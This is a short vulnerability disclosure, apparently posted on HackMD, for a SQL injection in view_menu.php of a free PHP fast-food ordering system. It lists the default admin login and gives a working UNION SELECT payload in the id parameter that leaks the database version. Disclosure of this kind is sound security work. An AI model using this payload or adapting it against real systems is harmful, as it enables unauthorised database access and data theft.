Try   HackMD

SQL Injection Vulnerability in /ffos/admin/menus/view_menu.php

Vendors Link: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ffos.zip
Vulnerability File: /ffos/admin/menus/view_menu.php
Vulnerability location: /ffos/admin/menus/view_menu.php?id=<id>

PoC

  1. Log in to the application using the admin credentials:
  • Username: admin
  • Password: admin123
  1. Navigate to the menu list page at:
  1. From the menu list, select the "Action" dropdown and click "View" to access the vulnerable endpoint (/ffos/admin/menus/view_menu.php).
  2. http://localhost/ffos/admin/menus/view_menu.php?id=1
    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →

    Modify the URL or input field with the following payload:
    [+] Payload: http://localhost/ffos/admin/menus/view_menu.php?id=xxx'+union+select+1,2,3,4,5,6,7,8,9,10,group_concat("result:+",version())--+-
    The response will display the database version
    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →